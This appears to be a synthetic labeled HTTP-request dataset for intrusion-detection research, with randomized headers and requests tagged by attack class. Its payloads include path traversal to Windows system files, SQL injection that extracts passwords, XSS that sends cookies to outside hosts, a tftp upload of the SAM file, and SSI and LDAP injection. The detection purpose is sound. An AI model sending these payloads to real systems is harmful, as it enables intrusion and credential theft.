Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: N1sxs@zaktif.st
If-Modified-Since: Mon, 12 Mar 07 21:43:34 CET
If-Unmodified-Since: Tue, 09 Nov 04 15:10:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: ApMa hfe8s=xotu3
Range: -500252,934-3694
Referer: /eum0uh4e.exe
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 2.8; Ot-e0; rv:2.8.3) Gecko/26235930
UA-CPU: StrongARM
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 8.3 www.aslmocje.html:2
Transfer-Encoding: identity
Upgrade: auRAi/6.1, wpa/2.1, dH7/6.3, c6nLr/9.1
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45773
Start - Id: 36144
class: PathTransversal
GET /matwAxeypetin0seo/aewtT3eUKs7AFv/ji4gaiJa/kt/yeks/shutdownRn7/sxNEzrZOmGX/eKZ36AQW0xktHZqtt/3W/7ersulgmsf6em.shtml?Tnn3neo=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&@allx6R8=dall8&HklV=9461&deleteKuautoexecp4bg@L=3460662&cmboddematliL=doyyynueYojo HTTP/1.0
Host: 70.249.181.18
Connection: keep-alive
Accept: application/x-tar, audio/x-wav;q=0.0, image/png;q=0.1
Accept-Charset: euc-jp;q=0.4, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 25.79.74.161
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="1"
Date: Thu, 04 Mar 04 24:13:09 UTC
ETag: W/"dK-JGragUggQ-4kMui"
Expect: 100-continue
From: aitunw@tegatgpn.uk
If-Modified-Since: Sun, 02 May 04 17:09:43 GMT
If-Unmodified-Since: Tue, 02 Dec 08 04:05:18 CET
If-Match: "ME6Y7eQWzaYbH.FiVXa"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: Mon, 27 Dec 04 17:15:37 UTC
Max-Forwards: 773
MIME-Version: 1.7
Pragma: 9Cj6ssi3='irm3slkt'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM bzJlOWV5YXJTbnNpRU0yaWxwbU9pYW11ZWlvZGZuM25u
Range: -52194,2-,7-21979
Referer: http://Rqfinwl.ch/tl1ea/oegtnrfM.gif
TE: chunked;q=0.0,chunked
Trailer: Connection
User-Agent: oscxensmD (oNf83fZEN; hKrt9jB; eFRD13g; eSfk@S; aAD@rjM5Z)
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: 5hek23/2.3 215.237.175.192:56911, HTTP/7.4 72.54.68.198
Transfer-Encoding: identity
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36144
Start - Id: 41996
class: SqlInjection
GET /sn4metaY/ittcTRowm/uLaGJrw5reOER/tRlsdmoy6/veelbsoedeiGToesbdh/ijd-mvBuJ.sh?hiewuk=0181618&7fgncxac=0110&ntlafuLSRw1=a&c8rcat2no2R-_=scih0Rtcwralrim&to8lyidLentut9=%27+%29+++++UNION+ALL+++SELECT+++nyse+++++%2C+mm+++++%2C++fatiaioa+FROM+++rA+WHERE++++lelet5++++NOT+++IN+++%28++++%27msg9yAxn%27+%29+++AND++huet++NOT+++++IN+++++%28++%27enEk88pen%27%29++AND++%27%27%3D+%27&ees52=2931491847&wwiqodts1T=ssshneah-G&bhr=8604311750&ordanlaJufgr8=f5Zwt3Aii&YXcopycNSg@@FJE=nR+0rw&ht4u=589 HTTP/1.0
Host: 75.12.171.169
Connection: close
Accept: video/*;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tof-2thDot
Cache-Control: only-if-cached
Client-ip: 134.245.214.117
Cookie: cM7hts=zCvF;itjorcbhtinl=hKFxRblhY5y5;TNx6dTGgroup byoDC=ranOp;oneleaaoeUysetg=wTRwx-I1C;ni_aBV5@WHZE=e;dhisnessgswle=89rohb
Cookie2: $Version="419"
Date: Sun, 14 Oct 07 08:41:27 UTC
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Thu, 18 Mar 10 02:06:43 GMT
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic eGFpYWg6ZVlubGxzUg==
Authorization: WpbNtb soaipaae=aige
Range: -728027,84041-8,736156-
Referer: http://7toCtirt.org/sbbmMiu/oernocn/unuiisNy/Uunltn/enyTObu.php4
TE: gzip,deflate,trailers
Trailer: Accept-Charset
User-Agent: oMq7uv http://www.eh6Yf.gov
UA-CPU: StrongARM
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: deflate
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 103.130.102.117
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41996
Start - Id: 47841
class: XSS
GET /Stl5t/3_VJHd8DLPWiE/G0/aepgWF3DNbF/nrt4gtjt5tnrLev/Oa/oESCUD/6trouwelykrefvheWk/lxxodaendjfrt/dBtmHeTC9vVCHT.jsp?nnZd0noh=ritliaeo&tltcotgnaEinW=43866&hK4N7=0&oipjrizs=%3Cimg++++src++%3D++++%22++javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.role.com%2Fcgi-bin%2Fellist.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&ealorebtxmtuT=thinsert&WJOB8AD=ho&eOcoooa2n=076467 HTTP/1.0
Host: 146.175.50.152
Connection: l3rQms
Accept: text/*;q=0.1, image/*, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: t9erM-tpsf;q=0.9, ernnFg-rldws;q=0.6
Cache-Control: no-transform
Client-ip: 145.49.48.15
Cookie: ahte1shau=nwhipslo
Cookie2: $Version="459"
Date: Thu, 11 Mar 10 15:26:00 GMT
ETag: W/"h.o9mDWvBmOAdKm@W"
Expect: hnkndi8=thtmdr
From: rntaoh@dim7.fr
If-Modified-Since: Mon, 22 May 06 06:49:15 GMT
If-Unmodified-Since: Sat, 17 Apr 04 11:27:20 GMT
If-Match: *
If-None-Match: *
If-Range: "L1pBSGEMNIT-en7_6M"
Max-Forwards: 0628
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: NTLM ZXNkb2xlbWR4bkFuZWZ1d3I2aGlJVG5lc2lhaG90dm5UckVyZU8=
Referer: /rneiEant/h0tyo/n6enb/fyiAet/wti71nt.mp3
TE: chunked,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/0.5 (compatible; reetfrfw; Open BSD i586; eeSGfo; ydfdzb; heeaebeei)
Via: 1.3 www.sqEju230.shtml, dSk6S/9.9 35.244.206.36
Transfer-Encoding: identity
Upgrade: oeeepq/9.5
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47841
Start - Id: 45130
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.Aheta9za.biz
Connection: sests1xh
Accept: */*
Accept-Charset: koi8-r, us-ascii;q=0.9, x-mac-chinesesimp;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=861
Client-ip: 223.196.253.50
Cookie: BUdivcclW=01679;Twindow.openiU=nndumthndsk;odepzsdi=9
Cookie2: $Version="6"
Date: Mon, 24 Oct 05 01:14:37 GMT
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Thu, 19 Feb 04 18:51:05 GMT
If-Match: "wZucsqr@HlFv@TYgFzo"
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 10
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /iyhiu5c4/astoeiv/edefmReE/utigu.pl
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: isanFnsaesanrm
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/7.6 www.trsl.jpeg, eia/5.1 248.65.64.243:0, HTTP/0.3 www.scdeq.shtml
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45130
Start - Id: 46940
class: XSS
POST /ggthGnw8XrZf/t_/pJ4W/9pHYtlCKIUN/DBDW1yuXmX9hN.css? HTTP/1.1
Content-Length: 414
Content-Encoding: identity
Content-Location: http://www.bttM.uk/iari.php
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 13:50:16 UTC
Host: 252.86.161.88
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr, x-mac-arabic;q=0.1, iso-8859-3;q=0.3, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: e-h
Cache-Control: no-transform
Client-ip: 164.215.140.175
Date: Mon, 19 Oct 09 08:28:24 CET
ETag: "2QUjnUW_IVja0L.6aDN"
If-Range: "35TVD9jyJY.xBOi8k"
Max-Forwards: 865
Pragma: no-cache
Referer: http://www.sel9nnN.uk/wIhach/syinvae5/eai1Db/ecridtd.mpeg
TE: trailers,chunked
User-Agent: Mozilla/0.1 (X11; U; Linux i586 7.8; fo-od; rv:7.3.0) Gecko/07637945

asrue=eormd&2aKsHawenN=hhyEQr_1G4&na4mc=5261491&Ahr7=b4kk54B.JMEw&m4eiihciwp4poer=856662336&tueeng=nn&lVynsgroup byECf=ehlkors50u8noeons&votq=d0mw$8i6praYstrja$&oroono2=<div   style   =    " binding:   url([http://www.llma.com/script/lAshm.cgi]);" >&dioXDe8eicr=abeneA3t&io= z&ne7mr=m2rtTfcstatu&4rbiI9wIq=iAjYwPbYA&tmplk0apositionSUqb92like=boSlFe1phaofewl&6gLahfle=lj0Fub8Rbcs

End - Id: 46940
Start - Id: 40933
class: SSI
GET /wF90/Lo/ldNsrslLoa/oRVAcopyT_4w6window.open5nF/wzGeD-AKvmX/wnnaDiithrh/oQEf.dnl99VNPz0/eve3P7Rr6CR4rQjGIbWH/lllsr/noxa1ecssikrowelb/qlaSveise/mjDRmnNqL.js?5oNla=%3C%21--%23odbc+++++connect%3D%22sna%2Clj%2C6it%22+++++++statement%3D%22select+++*++++from++++foj%22--%3E&ors=aa+s HTTP/1.0
Host: 86.6.251.57:633
Connection: 0nsowpp
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.3, compress, gzip;q=0.2, identity, deflate
Accept-Language: ogja-sia;q=0.9, rlne-d;q=0.9, cleewir5-A;q=0.9, rIpne-e
Cache-Control: no-store
Client-ip: 39.139.56.104
Cookie: drresengndygrn=s;nveo=955111753;59gSoa9Stnksesl=hv2p@mvZ
Cookie2: $Version="268"
Date: Mon, 03 Mar 08 18:15:06 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: 100-continue
From: ioOee@owoeu.be
If-Modified-Since: Thu, 11 Sep 08 02:03:07 UTC
If-Unmodified-Since: Tue, 06 Oct 09 12:34:28 CET
If-Match: "KpnsOLuH73ttjEj9HQPY"
If-None-Match: "71_1l-Y9scT6Pu8B"
If-Range: "Wk25p3m.Q@-G9Cz8VcE"
Max-Forwards: 8379
MIME-Version: 7.1
Pragma: neshaEiN=ss
Proxy-Authorization: NTLM b2ZUZW9sbnN3YnBZMHN1Ym9oQmVpZXNlbmQ3ZWl3MGZD
Authorization: NTLM c21lcm51ZTJ0MmV1aU5kc3N0eWtUa2NvbjdzZHNkc29rZWxFdHJk
Range: -25
Referer: /n2ncdm9.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.9 (compatible; gijgeo; Win 9x; ppldElotr)
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4871x5124
Via: HTTP/4.1 www.ptNetzt.css:4, HTTP/8.6 74.94.178.154
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: sade/0.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40933
Start - Id: 35326
class: SqlInjection
GET /Ehshattitw/aDoEikxJT9vspqkQ3/ynzaoH2hbnaq/eorhvAtrarienhse.tiff?qqBtQKVEYLzF=Ht&Ac3B=tbrloge08pg+olopens%26ehr&lfllaotos=5931499625&Nt78=eOse3xtgeVe33tra9&0eeawH3enRz=n&uUyz4SipyjlhEso=4FOoHz&gcs=92&atnouiHDab=hchildn6uvici&ea4ten=i+b&pfeetnhsfhk5oe=0723&rhi8Ahrc2srh=8703&qkeoedpbers=715069&ketuitt=6rnru8iw1amtbh&eIee=%27%3B++++begin+++declare+++%40ret+++varchar%288000%29+++++set+%40ret%3D%27%3A%27++select++%40ret%3D%40ret%2B%27+++%27%2BsUdei7b%2B%27%2F%27%2Bpassword++++from+++eoa+++where++te%3E%40ret++select+%40ret+++as++ret++++into++++foo+++++end-- HTTP/1.0
Host: 6.160.193.213
Connection: hKdt1o
Accept: image/*;q=0.5, audio/basic;q=0.4, text/*;q=0.5
Accept-Charset: euc-jp;q=0.6, windows-1252
Accept-Encoding: gzip;q=0.5, gzip;q=0.9, gzip, deflate, deflate;q=0.3
Accept-Language: pdl1et-3a, thehb-atn, m27y-sppsnz;q=0.7, sc0kN-el7eono;q=0.9
Cache-Control: max-age=01
Client-ip: 26.173.42.23
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="54"
Date: Tue, 03 Aug 04 07:00:50 CET
ETag: "-1ukDA-pz9i_RiM"
Expect: 100-continue
From: bEvfTsnh@Bj08etuio.cz
If-Modified-Since: Mon, 20 Apr 09 07:23:10 CET
If-Unmodified-Since: Mon, 08 Dec 08 19:59:25 GMT
If-Match: *
If-None-Match: "oI3z9pxdslHC95lMq"
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 65
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Basic VUVtdDplZWF2aGU=
Range: -699332,-7572
Referer: http://TeMiEan.cz/7arwn0/Hii7aas.rar
TE: trailers
Trailer: If-Range
User-Agent: d03Tpl http://www.idSe3loo.st
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/4.0 26.109.203.24, FTP/4.7 www.ehLeeM.js, zyd/0.2 www.heeeeco.gif
Transfer-Encoding: deaz
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35326
Start - Id: 44580
class: OsCommanding
GET /lmgiCkRCWlS_s_dIwj/iw/adtemteae/aih4dwe0eT8/7aste/Eothqlmwm3patriufh/vDBandZ/mSnLmk7waservices@30nullS.msf?sQoey=85.23.138.184%7C+++tftp++-i+228.226.235.165++++PUT+sam._&nct=92&cGn=597&inehd=ge&RacceptXW=winntthm1&f4zo0cGtp=%7C5iesm8+xmlhi++h0at&fgeisURo45ma=323300&mHRXobjectQ=ass&8swcaeetb=08&Ieeoog8oAcxpb=9dCEjnorlenallrbs&otarleouispbc=lZ9r&nnnfotruh=tWw4%40Kn3&tt=tDsa+&OWEE0=8&nrtt=T6t HTTP/1.1
Host: www.OEtqre3d.uk:22548
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, hz-gb-2312
Accept-Encoding: gzip
Accept-Language: hwN-xhAte8;q=0.0, ACatlsmm-o, 4ees-3g4
Cache-Control: min-fresh=9740
Client-ip: 161.135.140.107
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Mon, 15 Feb 10 24:41:35 GMT
ETag: "5lZWmVQ5I_0NdPW17aq1"
Expect: 100-continue
From: ne1pNm@taromiNse.be
If-Modified-Since: Mon, 15 Jan 07 06:55:46 CET
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "AKSK2K67PW_WvHrme"
If-None-Match: "hOItKIdkiYPa2EpC-B1f"
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 77
MIME-Version: 0.9
Pragma: reqiA='h'
Proxy-Authorization: Digest realm
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: /emidvju/tgpn/seNlt/a8sre22a.txt
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: 0YWLBXl http://www.uli9ehpr.de
Via: stt/8.2 www.eednmi.tiff
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44580
Start - Id: 42698
class: SqlInjection
POST /nGHaG_zz3_em0/u-/piHohReTldz/sR@L8Js@.XfVfiGLj6AT/v4Gth1xp_9M76/a8MDE4NI@tV3QS-/xhjWaPEk4RM7CN.png? HTTP/1.0
Content-Length: 66
Content-Language: ntea,ub,ra
Content-Encoding: identity
Content-Location: /trlyBg/teEbhaoe/0eehnsbx.conf
Content-MD5: aHRvZWFocWFlYWNmdGZsaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 21:52:47 GMT
Last-Modified: Fri, 22 Jul 05 15:27:34 CET
Host: 40.129.150.51
Connection: ovoc8Alo
Accept: video/quicktime
Accept-Charset: x-mac-chinesetrad;q=0.6, windows-1252, iso-8859-3, cp-950;q=0.1, windows-1258;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: '     union  select    sum(aeo)     from    epjeci--
Cache-Control: no-transform
Client-ip: 94.0.86.93
Cookie: ao9apDrtope7ha=o.Y;edk=tarEJeA;xhfg=6536;iNaruiilm=haheed
Cookie2: $Version="484"
Date: Thu, 09 Jun 05 15:25:44 CET
ETag: W/"gRLiLB5wRoWQbJgzKPp"
Expect: 100-continue
From: pNnqOl@04b6attN5.st
If-Modified-Since: Sat, 21 Mar 09 10:56:12 GMT
If-Unmodified-Since: Wed, 21 Dec 05 13:07:56 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Mar 10 13:34:57 GMT
Max-Forwards: 5746
MIME-Version: 8.0
Pragma: 0iWen=ejElne
Proxy-Authorization: Digest opaque="bii1e"
Authorization: NTLM eWFubm9pZWVvZTRodXJpZml0aThyZW5wemUzb25hNG9rcnMyRQ==
Range: -04,546226-,740980-
Referer: http://uaitakf.cz/ohteniw/KdglO3/eEerec7.fgf
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: Mozilla/2.7 (Windows; U; Win98 7.6; re-2i; rv:5.9.9) Gecko/17963315
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/1.3 www.dhmkn.shtml, 6.3 www.raopdi.htm
Transfer-Encoding: compress
Upgrade: yhsa/7.0, ltu/5.5, 8is/5.2, litm/1.8
Warning: 078 www.z47d5rts.png "dAdqeaztTcow" 
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oiantmq76ig=nc2H&St=eC&0l=e&e3=Wifn:hg&eweeos=775&wo5th=trZWO84l

End - Id: 42698
Start - Id: 47336
class: XSS
GET /sDSjw/0lqpBsMhuF9dGJp/4HntDy_YAhK@Lp7nYGP/owbeNJEXIflilz/yczbetY0swCrOtnhuao/Ioteteeoeo3/s0tEvufrK@dsz/jM/tssD22e7tNlMs.htm?vrtlmesfyeii=%3Cimg+src+++%3D+++%22livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.in.com%2Fcgi-bin%2Fanchllas.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&ttdu=a5A%3D&ctO1lZnthbut=Tr HTTP/1.0
Host: www.sbNiftnn.cz:464
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-950, windows-1254, windows-1253, iso-8859-1, windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 88.199.53.236
Cookie: adofdsooiH37=lMj@ub5JoP;doI8fdocumentT=4962004144;i0ndaiac7=adtt8eH1tcr2sbtB;nMRo3gJhavingN=\ te wp-o;Ts6TF=coRxre;iw=iZ@x4
Cookie2: $Version="9"
Date: Fri, 24 Aug 07 11:07:54 CET
ETag: W/"5grenAzcmdh-dh.U6"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Wed, 17 Oct 07 10:38:59 UTC
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "vew-IYVCuNYVU44"
If-None-Match: "Kdktep5DD.clQHSkjkz"
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 890
MIME-Version: 1.4
Pragma: lfq1Eoo=tnhowwh
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -7,-85784
Referer: /nehejl/elesaye/metr7hme/i6a1.dll
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: nsEoebekBs2b14iIs
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/8.9 235.121.103.199, 6.9 155.199.116.160
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 412179
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47336
Start - Id: 36927
class: LdapInjection
PUT /eyn5lEYT/yjYE.QS5YbhU/ayQ1WYnn6tKnL6OPZA/i8FXJKWx.nsf? HTTP/1.1
Content-Length: 314
Content-Language: tMtee,90wr1n,jgw
Content-Encoding: deflate
Content-Location: http://Danm.net/ldtd/nnisV.nsf
Content-MD5: ZW54ZWVlZWV2cWxhdGNzcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 167.91.168.118
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: cnst-nsjoio, gaoc-e4Bezien
Cache-Control: max-stale=167
Client-ip: 162.232.160.26
Cookie: tfeht2u1ado=3976722211
Cookie2: $Version="3"
Date: Sat, 07 Feb 04 24:29:52 GMT
ETag: "RZdC@lsq9GUwPpK44b"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 08 Feb 05 17:14:06 CET
If-Unmodified-Since: Sun, 11 Jan 09 16:12:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.9
Pragma: eyhe4ue=lSaoat
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM aHJoZXJlbmhoUnBnaG9hcHRkdGU4cmRlZG5mb2Vka2VDb3lhMGh0MTg=
Range: 561483-,67-,02097-305
Referer: http://X5ii.de/qotoe/tbtie/DriXx/tEstshu/ucoese8.jpg
TE: deflate,chunked,gzip;q=0.6
Trailer: Accept
User-Agent: ramsetn5sHs3teo
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 2.3 www.ayE2.css, HTTP/0.7 11.57.187.93, HTTP/0.9 www.qdco.js
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

anqDnufaavfmao=eSk4khfzoyX&gvoaenrtter0=tai:ErhFonsI&n&tmegedy=Im0eetnetefl&eepfm5RgweaSS=585)(&(objectClass=gnq)(|(sn =   ot)(cn=s4    J*))&w6senhippnE=tkraisrwsfJpaeh&ysecrs=e82yUpeE@&nseoSBhtyios=hbinEtj&Reosgew=a8e_rjDkoDP&ymr=8Off.80s&fehpjc9enho=e'fbe'tUxmlTio eoy2egh

End - Id: 36927
Start - Id: 44924
class: PathTransversal
GET /d0z2sB/hqsyAaeewnattadie8/ok@Dlq/enQS/tr1gj6SKWQUs45kQOMnX/fmC_8iq.tiff?4ta4imeorhtacod=n2bGHZQ&T9p0pwebsao=0&TaywcSmEfOa7ifd=oim9eaeoexnEpi&Ad1dhsyeaE=0&paC4et=mCIyy0&TnhGAL1-Tv.=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&ontonne=%5D&saatde=hu%2FL%3AnNf7&dwogbq=ni6yFgFc&8rduoTltl=rcxoldieql5 HTTP/1.1
Host: 11.115.43.43:80
Connection: rore9tao
Accept: image/png;q=0.8
Accept-Charset: big5;q=0.9
Accept-Encoding: compress, identity, compress;q=0.4
Accept-Language: vSl-tfE5T;q=0.6
Cache-Control: max-stale=3694
Client-ip: 156.228.249.233
Cookie: ueoealeAaa=efewwhct3Iojnnoe7e;c0ys=044840941
Cookie2: $Version="10"
Date: Wed, 30 Jan 08 18:44:49 CET
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 11 Aug 04 15:21:35 UTC
If-Unmodified-Since: Sat, 27 Dec 08 18:45:46 UTC
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: Sat, 26 Dec 09 22:00:24 UTC
Max-Forwards: 8599
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: http://www.tatajm.st/piisyytt.wav
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.0 (Windows; U; WinNT 6.8; te-rz; rv:0.3.4) Gecko/41047773
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44924
Start - Id: 41895
class: SqlInjection
